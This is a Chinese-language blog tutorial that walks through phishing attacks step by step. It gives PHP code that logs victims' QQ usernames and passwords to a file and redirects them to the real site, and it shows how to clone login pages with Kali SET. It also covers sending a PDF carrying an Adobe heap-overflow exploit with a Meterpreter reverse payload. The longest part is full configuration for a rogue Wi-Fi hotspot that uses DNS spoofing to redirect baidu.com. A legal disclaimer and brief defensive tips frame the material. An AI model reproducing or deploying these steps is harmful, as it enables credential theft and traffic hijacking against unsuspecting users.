首頁>技術>

注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。0x00 伺服器端搭建的釣魚頁面

這種釣魚頁面,較為常見,攻擊者註冊與相關網站類似的域名,然後利用該網站的主頁或登入頁面進行誘騙,引誘被攻擊者輸入賬號密碼等個人資訊。

這裡利用手裡閒置的阿里的一臺伺服器給大家做一下演示,構造一個簡單的手機端釣魚頁面。

先來看一下後端的主要程式碼:

[PHP] 純文字檢視 複製程式碼

<?php

if (isset($_POST["user"])) {

if (isset($_POST["pass"])) {

$myfile = fopen("fish.txt", "a") or die("Unable to open file!");

$txt = "賬號".$_POST["user"]." 密碼".$_POST["pass"];

fwrite($myfile, $txt);

fclose($myfile);

//在這裡他完成輸入之後進行跳轉

</script>';//echo是輸出函式,可以輸出文字或者變數

}

}

?>

可以看到在被攻擊者輸入賬號密碼以後,資訊被提交到同目錄下的 fish.txt 中,然後進行網站的跳轉,跳轉到真實的 qq 空間頁面。

在手機端是看不出什麼異常的,但是我們用電腦開啟看看。

在電腦端開啟的網站,url 地址顯示的是該釣魚頁面搭建的伺服器域名和地址。

如果在這裡我們輸入了賬號和密碼,資訊就會到 fist.txt 中。

而且如果你的手機有qq空間app的客戶端,不管你輸入什麼,都是會直接跳轉到你的空間的,在你沒覺得有什麼事情發生時,你的資訊就已經洩露了。

x01 用 kali set 生成的釣魚網站

這裡我們先來利用 社會工程學工具包 SET 中自帶的模組來生成 goole 的釣魚頁面。

生成以後我們訪問該 ip 地址,可以看到是 goole 的登入頁面,而且這個時候 kali 接受到一條訪問 ip 的資訊,我們嘗試輸入資訊,點選登入,kail中就可以直接得到資訊。

在倒數第二步我們選擇2.site clone ,還可以克隆其它頁面。這裡我又嘗試了去克隆 qq 空間的登入頁面。

不過這裡我發現在你 qq 登入的情況下,釣魚頁面會直接進入真正的 qq 空間的登入頁面,而且如果你使用快捷登入的方式或者掃碼登入的方式,資訊是不會被監聽到的。

0x02 用 kali set 傳送釣魚郵件

這裡我們嘗試構造一個利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢位攻擊) 漏洞,然後預設將 Metasploit 中的 Meterpreter 反向攻擊荷載記載到 PDF 檔案中,假如目標機中安裝有 Adobe Acrobat ,且存在該漏洞,我們就可以在對方開啟檔案時,釣魚成功。

下面是具體操作:

163郵箱的 SMTP 服務授權碼設定見下:

郵件傳送成功就像這樣。

但是,這個測試的時候,生成的帶有 Payload 的附件,有時候會被檢測出來。我們來檢視這個報錯返回了什麼,報錯狀態碼為 554,我們檢視後面的連結可以看到是因為附件被163檢測出來了。

0x04 利用釣魚熱點釣魚

這次我們利用 kali 和一個無線網絡卡,來構造一個釣魚熱點,本地搭建 DNS 服務,修改 DNS 服務配置來欺騙受害者。

將 kali 與物理機進行橋接,與物理機在一個網段,然後插入無線網絡卡。

因為要啟動 dhcp 服務,我們先給虛擬網絡卡 eth0 設定一個靜態 ip 地址,

[AppleScript] 純文字檢視 複製程式碼

gedit /etc/network/interfaces

iface eth0 inet static //說明靜態配置

auto eth0 //指定網絡卡

address 192.168.43.76 //配置靜態ip

netmask 255.255.255.0 //子網掩碼

gateway 192.168.43.1 //閘道器

重啟 kali 的網路。之後我們將網絡卡 wlan0 設定為監聽模式

[AppleScript] 純文字檢視 複製程式碼

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

接下來我們使用命令airbase-ng -e CICO -c 11 wlan0mon去建立 WIFI 。

保持該程序,重新開啟一個終端,配置 wifi 閘道器。

ifconfig at0 up //啟動新建的 at0 虛擬網絡卡

gedit /etc/network/interfaces

auto at0

iface at0 inet static

address 192.168.1.1

netmask 255.255.255.0

重啟 kali 的網路,可以看到 at0 已經有 ip 地址了。

接下來我們再來安裝配置 dhcp 服務,沒有該服務,手機無法連線釣魚 wifi。

安裝以後,我們設定一下網段,子網掩碼,閘道器地址,預設 dns 伺服器地址,配置如下:

gedit /etc/dhcp/dhcpd.conf

subnet 192.168.1.0 netmask 255.255.255.0 {

range 192.168.1.100 192.168.1.150;

option routers 192.168.1.1;

option subnet-mask 255.255.255.0;

option domain-name-servers 192.168.43.76; }

將 at0 指定為 dhcp 的網絡卡。

gedit /etc/default/isc-dhcp-server

INTERFACESv4='at0'

重新啟動 dhcp 服務。

下面我們來配置最重要的地方,就是 dns 服務,以 dnsmasq 為例,具體配置大家可以參考這篇文章。

https://sp4rkw.blog.csdn.net/article/details/101681716

我們之所以可以用該熱點釣魚成功就在於 dns 服務的配置,安裝以後我們進行如下配置:

gedit /etc/dnsmasq.conf

resolv-file=/etc/resolv.conf

strict-order

listen-address=192.168.43.76

address=/baidu.com/47.**.**.** //將域名解析到如下地址,該例中我嘗試將baidu.com的域名解析到我自己的伺服器下。

server=8.8.8.8

server=114.114.114.114

重啟 dnsmasq 服務。

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76

這裡我們就完成了釣魚熱點的搭建,連上熱點的手機訪問百度的域名都會被解析到我的伺服器地址......

0x05 避免釣魚方法總結

(1.)不要隨意連公共的 WIFI 網路。

(2.)涉及到賬戶,密碼等個人資訊的提交登入時,確保網路環境可信。

(3.)儘量不使用賬號密碼的登入方式登入。

(4.)垃圾或者來歷不明的郵件附件不要檢視。

(5.)別相信絕對安全。

注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。

  • BSA-TRITC(10mg/ml) TRITC-BSA 牛血清白蛋白改性標記羅丹明
  • 4.vue中的v-html指令